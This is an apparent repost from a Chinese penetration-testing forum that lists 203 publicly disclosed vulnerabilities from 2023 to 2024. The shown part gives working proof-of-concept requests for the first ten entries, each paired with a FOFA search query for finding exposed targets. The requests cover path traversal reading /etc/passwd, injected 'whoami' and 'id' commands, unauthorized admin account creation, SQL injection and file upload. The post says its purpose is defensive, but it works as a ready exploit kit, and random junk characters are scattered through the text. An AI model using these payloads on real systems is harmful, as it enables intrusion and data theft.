中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]
作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-202406+ j, t4 {) v; @" e
道一安全 2024-06-05 07:41 北京3 G- w) ^  ?& N" a* B2 r# k
以下文章来源于网络安全新视界 ,作者网络安全新视界
& e, G9 M6 v# H7 w6 i, O- W# n0 _$ R
! o- i% J* U" g! m, i8 p发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
- K6 B+ M. |" `0 @4 ^8 Q7 p* o0 V$ l* L; G/ h
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
7 \- n" i. C+ J! h( W0 j4 X+ B' Q* M8 C6 D! K( j  @7 M' w
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。; J7 ~1 j9 ?9 z
  p$ k& L- L& B# [. R  I
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。( N: S0 y7 ?: d: r% L" [+ z

' J% x' @& c; @. T: Y6 {' v合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。$ z) K: ~$ h; {# u

! K" D: ?& D1 ~3 N" D4 t# _5 G/ |) J
声明  N) C: C  R5 R* m1 ~- c; g, `/ H

% ~. g5 K( _1 A! p! Q5 A' k9 @为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
4 F2 Q& w- ?3 q; N3 Y! C; T% o+ V7 k; E' \0 W2 F! ~: A1 S
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
3 w. Z( ?8 |' \! S  e( c
+ w9 Q( L" W- R3 V0 ?( r) q" A* U2 I# b1 O
; c  |5 x: O& j! V# K, E$ Q0 v- p% a$ L
目录9 E/ O( d- t' u9 R; i. @$ u: ~9 j
1 [: Y3 N6 Z9 t; [2 A
01
2 m: g, J( n" p9 Q) E1 U7 o& [
+ e. [( e  h& V( t1. StarRocks MPP数据库未授权访问8 |6 o  F  ?# r' A
2. Casdoor系统static任意文件读取, S  l/ E, t" F! [+ Q! J
3. EasyCVR智能边缘网关 userlist 信息泄漏, `. a2 z. x6 M* G
4. EasyCVR视频管理平台存在任意用户添加
7 g0 G9 B) U# O' h1 J, J0 t5. NUUO NVR 视频存储管理设备远程命令执行
- c1 K; ]' c  Q6. 深信服 NGAF 任意文件读取& S1 `! h# ]0 B# J, Z. P  F7 P
7. 鸿运主动安全监控云平台任意文件下载
, r6 J7 z& z1 @) U8 p& c* n8. 斐讯 Phicomm 路由器RCE0 H9 z4 W9 c# H8 y( U
9. 稻壳CMS keyword 未授权SQL注入
3 Z# B# J7 U7 A& {! Z8 ?' c10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
9 e8 w/ E' e' }9 S% }( h* z, i* i- ]11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入; q  U: Q0 X4 F& G+ ]5 K' `; e, @
12. Jorani < 1.0.2 远程命令执行& `9 m6 i- q1 v  {3 m
13. 红帆iOffice ioFileDown任意文件读取
1 C( R# ]) Z0 b: ^" y% f14. 华夏ERP(jshERP)敏感信息泄露
5 H6 Z" d; |6 d4 K: g15. 华夏ERP getAllList信息泄露2 t; K& t" s  j9 }7 T
16. 红帆HFOffice医微云SQL注入8 ?  c# J+ M+ I9 u" w# ~- U# X% v* J+ _
17. 大华 DSS itcBulletin SQL 注入
7 r, l$ X+ F, d/ i+ K+ ^" S18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
, J" I& k5 r' J19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入' @+ `3 f: l6 [2 u
20. 大华ICC智能物联综合管理平台任意文件读取& j$ S3 \- u) X" }0 g, _6 J
21. 大华ICC智能物联综合管理平台random远程代码执行
, K' A$ V. c5 u, b: A" Y4 ~8 z22. 大华ICC智能物联综合管理平台 log4j远程代码执行& E1 z& b+ w6 |* y- |  E
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
. x$ O) [. p0 ~24. 用友NC 6.5 accept.jsp任意文件上传! ?" Z) X/ F3 E: e
25. 用友NC registerServlet JNDI 远程代码执行
4 o% G9 z7 R; k! ?' {' h26. 用友NC linkVoucher SQL注入8 x0 R, l( K7 i2 q# ^! _
27. 用友 NC showcontent SQL注入( u5 b( z1 r: c
28. 用友NC grouptemplet 任意文件上传0 w% T, ^% J4 D4 i; V5 m* O8 E3 A& o
29. 用友NC down/bill SQL注入$ U: k8 i  v: i4 A" Q& @" t
30. 用友NC importPml SQL注入0 E7 U& p. E, \' V, H6 t9 `% T
31. 用友NC runStateServlet SQL注入
8 {. p8 R( g1 E8 N; D( F32. 用友NC complainbilldetail SQL注入" T  \: z$ _) ?3 {2 d
33. 用友NC downTax/download SQL注入- G/ D. m( v+ l3 a
34. 用友NC warningDetailInfo接口SQL注入5 _( A' M1 x+ O- j
35. 用友NC-Cloud importhttpscer任意文件上传
* Q3 ]' n9 L( d4 m: a: q/ n36. 用友NC-Cloud soapFormat XXE2 K8 @1 C+ [. }8 A( F
37. 用友NC-Cloud IUpdateService XXE1 y7 l' x# {1 t* H; n
38. 用友U8 Cloud smartweb2.RPC.d XXE5 p& U- G7 n, j  ~
39. 用友U8 Cloud RegisterServlet SQL注入8 c" s+ P7 p0 b8 g+ S
40. 用友U8-Cloud XChangeServlet XXE2 }0 Q* r: _; d: x
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入. Y9 b6 b  d; t/ _) C
42. 用友GRP-U8 SmartUpload01 文件上传
" f; G; U2 Z( s43. 用友GRP-U8 userInfoWeb SQL注入致RCE
: v3 |" J3 O" B! m4 e44. 用友GRP-U8 bx_dj_check.jsp SQL注入9 K3 ]0 i5 z2 a0 o. y! K9 s
45. 用友GRP-U8 ufgovbank XXE
. N* u6 _! ]# p: k0 w/ ^: }46. 用友GRP-U8 sqcxIndex.jsp SQL注入& i- \! |% W$ U& k! ^7 Q/ e; p
47. 用友GRP A++Cloud 政府财务云 任意文件读取$ U; E# L% I/ y6 k2 P, ?0 P9 b
48. 用友U8 CRM swfupload 任意文件上传
# n) v7 R% s( c5 m; G% C* c, F49. 用友U8 CRM系统uploadfile.php接口任意文件上传: y; R7 s+ K  ^
50. QDocs Smart School 6.4.1 filterRecords SQL注入+ z/ q# h, u" }8 a2 x1 m
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入% Q4 Y: H( L9 T$ E; r8 `$ o$ i' I
52. 泛微E-Office json_common.php sql注入8 ?0 s# t' I3 g* m+ ?) c
53. 迪普 DPTech VPN Service 任意文件上传2 X2 N& S! f4 {2 u  o; ~+ P  ]
54. 畅捷通T+ getstorewarehousebystore 远程代码执行9 J5 |8 C# F$ G8 d% ~, [: l6 j
55. 畅捷通T+ getdecallusers信息泄露& j! i# g5 |0 A, L  i
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE8 U2 n' n( S; y2 M$ D
57. 畅捷通T+ keyEdit.aspx SQL注入
9 t1 v, P7 @9 W2 S5 `8 T58. 畅捷通T+ KeyInfoList.aspx sql注入4 k0 |2 n; r& T; p
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
# N" L* L6 l; c" @+ `0 v60. 百卓Smart管理平台 importexport.php SQL注入* z% T9 ~9 Q1 \  T9 v6 X
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 N, w3 K3 F4 y& S
62. IP-guard WebServer 远程命令执行4 G. E3 |$ J* U1 P) m
63. IP-guard WebServer任意文件读取  c: O" ^. L" S5 w
64. 捷诚管理信息系统CWSFinanceCommon SQL注入9 g6 t% U1 g0 J9 y: r! @$ [7 N/ r
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
. Q. B% [6 E8 q4 u! H! @! O4 G66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入( E& |' p. L% V* T7 E
67. 万户ezOFFICE wpsservlet任意文件上传
/ a$ N* Q3 K8 s1 S1 T7 j68. 万户ezOFFICE wf_printnum.jsp SQL注入
! A( g" N# }; `* f4 D69. 万户 ezOFFICE contract_gd.jsp SQL注入
. J6 v+ H' `, z$ d70. 万户ezEIP success 命令执行
/ d5 ]" I" ?! n7 Y) Y  U! j3 D$ I71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
/ ~. }3 u# e) s, {  M9 z( ?72. 致远OA getAjaxDataServlet XXE+ @+ u7 w7 Y# w1 d  B
73. GeoServer wms远程代码执行
+ N( m) f' s- d# r74. 致远M3-server 6_1sp1 反序列化RCE
/ E4 m1 q4 G1 v" _75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE7 d5 S6 q, Y6 \' G! K
76. 新开普掌上校园服务管理平台service.action远程命令执行1 P1 U" b8 V  {: M+ `" O& w
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
- N" T% B% l: n$ A3 o4 Z78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传6 u8 R2 M5 o1 y0 G! d7 X
79. BYTEVALUE 百为流控路由器远程命令执行
: w+ P: I( `0 \. |4 d80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
4 f/ t0 `9 \0 e# t  t81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
. ]5 {, F, u- Q* o82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
+ a& X* a1 X5 n8 K& I83. JeecgBoot testConnection 远程命令执行3 Q$ q# Z; C+ j( H9 e5 ~$ `
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入& c' a/ p+ m% |" A1 a0 S+ N( T
85. SysAid On-premise< 23.3.36远程代码执行& J# x2 Z8 F9 X& G# o( a2 v% T
86. 日本tosei自助洗衣机RCE
0 r7 G: P6 @: \0 D# e) s8 @1 _87. 安恒明御安全网关aaa_local_web_preview文件上传
3 x3 H) A- m/ I& J2 v88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
6 z9 L( ~6 W; I" W5 _89. 致远互联FE协作办公平台editflow_manager存在sql注入' f* Q' w+ T/ \! V6 I9 L0 t
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
9 D' M1 h" Q" T7 k, _4 ]91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
; l. h! e. z2 b$ ^$ u- ?4 S5 V8 T92. 海康威视运行管理中心session命令执行
, j* {! P( E( H93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
) Y4 k" `0 w. B8 L5 B( Z) Y94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传4 ?" F# p9 Q! U+ s" @8 H
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行" |+ ^" F  q- f# S
96. Apache OFBiz  18.12.11 groovy 远程代码执行/ s, r1 e7 e' {# G: ]
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行: \+ T4 e& `' J, v0 f6 K, H
98. SpiderFlow爬虫平台远程命令执行
7 {5 S4 g9 e" Z2 n; ]99. Ncast盈可视高清智能录播系统busiFacade RCE
2 m' P, Y& g( I; n100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
6 T! _- v8 i/ \4 V& d5 T* P101. ivanti policy secure-22.6命令注入
- W4 F. b4 Y  F/ ?2 K102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行- n# R2 t. q' ^; B  p' ~1 m( D6 h* i
103. Ivanti Pulse Connect Secure VPN XXE
, u6 L6 h  q* M5 c8 M104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
$ J  L! ^: E) Z# G( p105. SpringBlade v3.2.0 export-user SQL 注入
  |7 L* ]* }3 r" F0 k106. SpringBlade dict-biz/list SQL 注入: ~  D: J( r  A! I3 w
107. SpringBlade tenant/list SQL 注入. y+ c% O. }% T9 M
108. D-Tale 3.9.0 SSRF
! [2 M. j; s3 X" C, P$ ^1 G; c109. Jenkins CLI 任意文件读取: x1 R) A! V: l# z
110. Goanywhere MFT 未授权创建管理员
( {6 b  r$ k' w+ [. V  b; N( B111. WordPress Plugin HTML5 Video Player SQL注入
) |3 m+ _$ ^' i112. WordPress Plugin NotificationX SQL 注入. m! D8 Z' m2 m7 Y7 u! X# v- w
113. WordPress Automatic 插件任意文件下载和SSRF- r1 s/ T, c* w' x0 b! V
114. WordPress MasterStudy LMS插件 SQL注入
" Y( F7 t" B; p* M4 ^' n$ U2 B( m115. WordPress Bricks Builder <= 1.9.6 RCE
0 J1 H# D5 q4 h. g* t) ?116. wordpress js-support-ticket文件上传
5 }  C: |! R: Z  R/ Z0 |) Y8 p1 v8 ?117. WordPress LayerSlider插件SQL注入
. F# K4 f- f/ M118. 北京百绰智能S210管理平台uploadfile.php任意文件上传" |) R+ N- y7 ]8 u' d; y
119. 北京百绰智能S20后台sysmanageajax.php sql注入. ?- Z7 `9 F2 l# T7 @: S
120. 北京百绰智能S40管理平台导入web.php任意文件上传- Z$ j0 G& l; b' P
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
' b6 E0 o6 G0 ^( T2 ?122. 北京百绰智能s200管理平台/importexport.php sql注入
( I% M" @$ C% I, E  D123. Atlassian Confluence 模板注入代码执行
' b) s( R1 e6 ]; ^( b124. 湖南建研工程质量检测系统任意文件上传
: l' {3 c" W& S. |1 e125. ConnectWise ScreenConnect身份验证绕过
& k7 n" b+ x; ?7 W; w126. Aiohttp 路径遍历; v0 ~+ I2 U6 X; N
127. 广联达Linkworks DataExchange.ashx XXE
7 D+ n9 [3 c) J8 z# D3 F$ N8 D0 ]128. Adobe ColdFusion 反序列化. q3 O5 D" H+ y( L9 q
129. Adobe ColdFusion 任意文件读取; m2 ?- S. s. ^
130. Laykefu客服系统任意文件上传/ j& T- j" T( |* p" d2 v0 Z
131. Mini-Tmall <=20231017 SQL注入+ p6 q( }6 s7 D' |  y4 l( O5 p
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过6 c. Y; n* j' A; v: Q  ]
133. H5 云商城 file.php 文件上传; _) l4 f1 u2 M  b/ T
134. 网康NS-ASG应用安全网关index.php sql注入7 b* u" ^1 h9 Q; P3 T
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入, W  Q; U2 {) f$ A. r& A+ C- \
136. NextChat cors SSRF5 X. j7 @) _$ y3 Q$ b9 a5 A) R
137. 福建科立迅通信指挥调度平台down_file.php sql注入& `" N2 [$ p0 H
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
# C) e3 r6 m0 e, q. j139. 福建科立讯通信指挥调度平台editemedia.php sql注入
9 M% E8 N6 M% W# T: q& W140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
+ j) I. ~( z2 d) g1 E$ F141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
3 A/ R$ ?, U7 ^. N- i; _142. CMSV6车辆监控平台系统中存在弱密码
5 W$ K: B$ M# I4 j143. Netis WF2780 v2.1.40144 远程命令执行
5 h* B$ T& ?) m$ O& P1 A144. D-Link nas_sharing.cgi 命令注入( i* G2 P/ ?7 x0 x9 R
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入  m$ s1 }# B- @
146. MajorDoMo thumb.php 未授权远程代码执行& i& r: h. `. R0 b. I
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
/ z) {$ n# s; c: |' ^" }1 d148. CrushFTP 认证绕过模板注入' F: \1 h- p  R7 }( z7 _# e2 q
149. AJ-Report开源数据大屏存在远程命令执行
! |$ h+ F) ^5 f+ i- o7 B6 J# y150. AJ-Report 1.4.0 认证绕过与远程代码执行% C3 ?8 H0 S2 g/ B/ O
151. AJ-Report 1.4.1 pageList sql注入
' b( l0 f5 P) x0 h152. Progress Kemp LoadMaster 远程命令执行
% E7 j3 l$ W/ A153. gradio任意文件读取9 o% W; Y4 E7 I& N+ ?/ x
154. 天维尔消防救援作战调度平台 SQL注入
- i; i: D' V# j155. 六零导航页 file.php 任意文件上传: ?6 |6 f) j0 Z. k
156. TBK DVR-4104/DVR-4216 操作系统命令注入
( u$ q& o* {4 d& V7 X" t; M157. 美特CRM upload.jsp 任意文件上传) E+ L7 Q, c8 I! ^
158. Mura-CMS-processAsyncObject存在SQL注入
; R, C; ?$ o) g159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传) g3 c) ^- {6 r( w0 `3 M8 a
160. Sonatype Nexus Repository 3目录遍历与文件读取0 I1 ]" d2 C4 A0 `( Z
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
. l1 ?6 d- ~5 h0 ?162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
+ P; Z, N: b7 E2 e163. 号卡极团分销管理系统 ue_serve.php 任意文件上传+ u3 q6 O4 s3 z; V$ @- I
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
* Y( @' F' C  h165. OrangeHRM 3.3.3 SQL 注入
2 d) o! g# D1 i# t1 J166. 中成科信票务管理平台SeatMapHandler SQL注入
3 `4 e! [% r' U. v; B* l2 M0 R, L167. 精益价值管理系统 DownLoad.aspx任意文件读取
. |8 O1 l) `6 L5 x) w168. 宏景EHR OutputCode 任意文件读取% E/ F) z% t  t+ D# k
169. 宏景EHR downlawbase SQL注入
/ O( ~( k1 t& z1 k3 d3 \  h8 ^170. 宏景EHR DisplayExcelCustomReport 任意文件读取
) N0 ]+ L  [" s! ?171. 通天星CMSV6车载定位监控平台 SQL注入% z7 O9 ~% w" }! p0 t: b
172. DT-高清车牌识别摄像机任意文件读取3 X4 t' M2 v0 C+ R# f2 {
173. Check Point 安全网关任意文件读取
, p5 J, F) Y- N! V8 C174. 金和OA C6 FileDownLoad.aspx 任意文件读取
) Z1 |9 P/ _4 e' Y) e175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
5 w! ]5 S* a4 |  A5 e# O" v' g176. 电信网关配置管理系统 rewrite.php 文件上传
8 @2 g1 A" y+ S7 z, Q4 r; N177. H3C路由器敏感信息泄露
- k  z& \; _0 p6 q, \178. H3C校园网自助服务系统-flexfileupload-任意文件上传% f  G( _. X' u1 r& u
179. 建文工程管理系统存在任意文件读取  S& R& }( f4 a! e6 x7 [9 H
180. 帮管客 CRM jiliyu SQL注入
: N, g; @: r) M% r7 t181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
" ^! D. v& T9 E2 C! U" @4 |$ u182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建8 J1 T1 S- b/ [6 A* M, @$ }6 x" e+ p
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入* M) }6 ~' p9 z1 {. H1 r
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
1 u( A( I1 Z& {# i6 \185. 瑞友天翼应用虚拟化系统SQL注入
- `, }& |% `  `& f$ t$ |4 G186. F-logic DataCube3 SQL注入/ o, u  I2 s. ]! `5 O* x2 [
187. Mura CMS processAsyncObject SQL注入
* g2 [  S9 ^5 v7 g188. 叁体-佳会视频会议 attachment 任意文件读取- w# o9 M8 Y% s
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
7 U' F- I2 Q3 J/ X9 s7 e' V190. 短视频矩阵营销系统 poihuoqu 任意文件读取
7 e$ B; z0 u' i5 Z# B* j' o# e191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
% t/ K; J6 V+ j0 E3 _' L192. 富通天下外贸ERP UploadEmailAttr 任意文件上传( p; n! p9 i$ ^; p: ~% F: P3 \
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
6 i2 ^7 t6 @' N. ]( D9 |3 W1 Y& e194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传, S! N6 ^: d$ d* W4 l
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行; u; Q, V/ h( O  S. n; r- b; B
196. 河南省风速科技统一认证平台密码重置
. C* h2 {% s- z$ t$ L' P( N/ g197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入  `: y9 @" A; K" b' C
198.  阿里云盘 WebDAV 命令注入
; _! c, [! `" a199. cockpit系统assetsmanager_upload接口 文件上传
1 R# z; |" Q% d; V% R& O$ w* u200. SeaCMS海洋影视管理系统dmku SQL注入
& f# S6 ]& a# R: I, s( l201. 方正全媒体新闻采编系统 binary SQL注入
: J- Y' J3 q- b" k! {- u$ t202. 微擎系统 AccountEdit任意文件上传
6 e' _, o% ^7 n4 q' M6 t' k203. 红海云EHR PtFjk 文件上传
3 s8 G4 @. v8 I. T$ A2 |) c
: e" `  K9 Z0 R9 w% pPOC列表
  D: k9 D5 r3 n3 u# \9 \
  v. i4 W" U( O  g$ w023 [3 z1 g% c. e/ a- E; z' n

" B5 `- v  E9 q# X) r1. StarRocks MPP数据库未授权访问
! `2 Z: @8 s# L& k6 F: uFOFA :title="StarRocks"/ z: o$ M* u# r8 ?6 c" I
GET /mem_tracker HTTP/1.1
5 U9 t5 G! B7 V7 B% @, ^6 ]Host: URL  v$ |1 R5 I, ]: ?. e% G4 k# H! W
5 d( N: Y1 \0 K3 M3 F$ v

% p1 C# k$ a; I' Y/ v6 l8 O2. Casdoor系统static任意文件读取
% }! c3 h; D: y* m# ^- EFOFA :title="Casdoor"/ d2 B/ E8 K! T( C( Q
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
. c0 z4 V! o2 n4 T1 F2 p; QHost: xx.xx.xx.xx:9999
* b- |* [% H2 R. [* R$ ]5 C1 F! ]) JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- S- n, C) T( O& C  e
Connection: close/ P& |4 }1 P/ J2 s
Accept: */*
6 h2 r* V. Q6 c) Q4 |Accept-Language: en# B$ v' N* ~& P: R' L6 c$ R1 R
Accept-Encoding: gzip
. ]% e9 ^; i" O4 f4 T/ n
& H/ n- a, g) o! a* f  P- E; H$ K4 L% B6 Q: H: s" o
3. EasyCVR智能边缘网关 userlist 信息泄漏, A6 `+ K$ T3 p% v- \. j3 n! h6 @
FOFA :title="EasyCVR"
, Q) r4 I+ k. \6 {/ SGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
* @( G$ y; _5 [) V' m3 x- CHost: xx.xx.xx.xx$ S7 k, k- P( q

6 h' H  ^& {; l7 U- E  D% K4 ^; I
4. EasyCVR视频管理平台存在任意用户添加
  l9 w' q, H5 f, A3 w) @, \1 |, LFOFA :title="EasyCVR") U1 Z9 u* {8 [. ^9 W

5 a( {- k$ f# h- m, r, y3 e2 q( Ipassword更改为自己的密码md5
" I# N( S, W) ^) Y& BPOST /api/v1/adduser HTTP/1.1
: }  a4 w3 S# N0 F1 [Host: your-ip3 D1 f# q2 k' H4 @4 l2 e' i8 C1 f
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
, k- Y. j) E* d8 n) q1 g% M
$ e9 [- P  P, C1 P4 F7 bname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1" w8 j* p& @( q

1 z. d# T7 ]- W) u: H, I1 @& z  @7 C9 a6 r, W3 j, [8 c
5. NUUO NVR 视频存储管理设备远程命令执行5 {+ @2 X5 W* f9 V
FOFA:title="Network Video Recorder Login"& \( p$ c. m7 r5 j
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
5 B. U7 f0 A8 Y) ~2 {9 oHost: xx.xx.xx.xx3 s  x+ j  ?7 C. c

7 g+ L2 f: ]" H) ^9 V5 ~7 v) e! Z9 I3 f+ s/ o: r
6. 深信服 NGAF 任意文件读取
3 C. z) t* a' aFOFA:title="SANGFOR | NGAF"/ E  g# B, ^) s
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
& R: s( `, x- m. `% S0 E( dHost:. z+ v7 f# \  A9 Y0 s1 j7 c/ Q6 `% E% y" W
5 g- z3 q6 Q( b" \  D, b
+ ]$ ^: J6 S- Z, y& S
7. 鸿运主动安全监控云平台任意文件下载
; U1 y; W8 L5 \4 _FOFA:body="./open/webApi.html"
1 a& U; x3 a  Y# \2 I$ {  q5 SGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
$ @! i  E5 Q1 t* J( o) @7 `. W6 @Host:
, L; H0 h, g: h
& B3 D  j2 s! S; X$ ?" \! O4 `! E& U. ]+ e- a
8. 斐讯 Phicomm 路由器RCE$ G! m# n% e5 q$ K* G: i% d1 Y/ t, c) @
FOFA:icon_hash="-1344736688"6 M) J  |% J/ ?7 Z# J/ H( g
默认账号admin登录后台后,执行操作# O5 V$ S3 o0 w: l, ]& b
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1' G' }' {( K# r$ C8 [' T" o
Host: x.x.x.x, j4 T# I6 D& ]* n2 t- V8 b0 p1 R' _1 [
Cookie: sysauth=第一步登录获取的cookie
0 b$ {5 Z& v/ v2 S7 b/ o. BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
8 V9 l& e, [2 i: G: HUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
3 J  u! }$ P- }3 e
5 J6 P; c- F# K------WebKitFormBoundaryxbgjoytz
  s/ g. T6 g+ q* |( q: b9 VContent-Disposition: form-data; name="wifiRebootEnablestatus"
; w! C+ Q) Q# o+ B0 h/ ~
) C; ^1 n7 z( `: Z+ K/ w) n  F%s
; p$ S3 ]* \! M$ ?7 n7 S6 W) h7 B------WebKitFormBoundaryxbgjoytz
7 i( o% r5 S  g% O- Q. w6 F/ ?Content-Disposition: form-data; name="wifiRebootrange"
2 Q$ h1 t' Q" }4 t% N/ J3 D
, ?) `2 N4 k1 A6 H: W& h12:00; id;! ?$ z3 L" [' O) \; B& B
------WebKitFormBoundaryxbgjoytz! {" L/ ]: X# j: `: M
Content-Disposition: form-data; name="wifiRebootendrange"
" |7 n; a9 a0 w3 K; X: w- u( d- R8 F( t$ l% J8 E: d& ~  q$ c- i8 {. ]
%s:
' {2 U7 E3 P7 \! U% q2 N------WebKitFormBoundaryxbgjoytz
! @* N- o( s& y. ~$ i+ kContent-Disposition: form-data; name="cururl2"
* F7 [# `) s# @5 {$ {! l7 p! ?' Z3 R* H2 F4 a5 K. f4 {

: }" V# n4 d! @. i. o------WebKitFormBoundaryxbgjoytz--
! _2 p% ?! ?, D1 n4 D; }+ }$ R/ j) i

# [! Y, R* `- M: y1 B9. 稻壳CMS keyword 未授权SQL注入
- U& K$ u" M1 g" m" A" [FOFA:app="Doccms"2 O7 R4 a0 D# o' ?- b2 ?9 ^
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1  Q8 s- T' {' J! e5 B$ {
Host: x.x.x.x
* U4 \& S* I! D1 D/ x
! m! j2 {6 N, Y) a1 F2 |! o
# b. ?% `4 c4 s' Npayload为下列语句的二次Url编码
( E" ~! L# N7 _5 c$ }! A' E: o( r+ }0 q
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#, Z- F/ n  K- \9 a$ Q
0 S! {& D- S# ~
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
- E1 v9 o9 q& w+ PFOFA:icon_hash="953405444") \# L+ z/ N1 n

' M! z, w/ k2 {3 c* ]# R文件上传后响应中包含上传文件的路径" Q9 X+ {3 }8 c- u1 G  D# t# M
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
2 e/ d; Q# {0 j# e5 tHost: x.x.x.x:xx
0 S% W$ E' E- P4 T5 g# RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
* \5 ~3 @$ v1 h9 P# QContent-Length: 197
6 P& T# T$ |  ^" b- ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.93 V, j! q4 P% C. ~  J. T! W& e
Accept-Encoding: gzip, deflate
+ t) @; l% T: AAccept-Language: zh-CN,zh;q=0.9
  J+ E4 _4 v( |# M: SConnection: close
& F$ r+ e. Y) e# RContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu4 M+ ?; @7 l) H5 W* R: o3 S
* x8 k6 t4 U+ R8 z. R4 Z: }
------WebKitFormBoundaryxdgaqmqu' g- z3 Q# U8 N
Content-Disposition: form-data; name="file"filename="icfitnya.txt"4 C+ L* e9 C$ b$ @; o- u
Content-Type: text/html' Z+ j* p9 e6 ]/ F
" H1 c$ {' ?) V4 m% b+ e$ k5 x/ p
jmnqjfdsupxgfidopeixbgsxbf
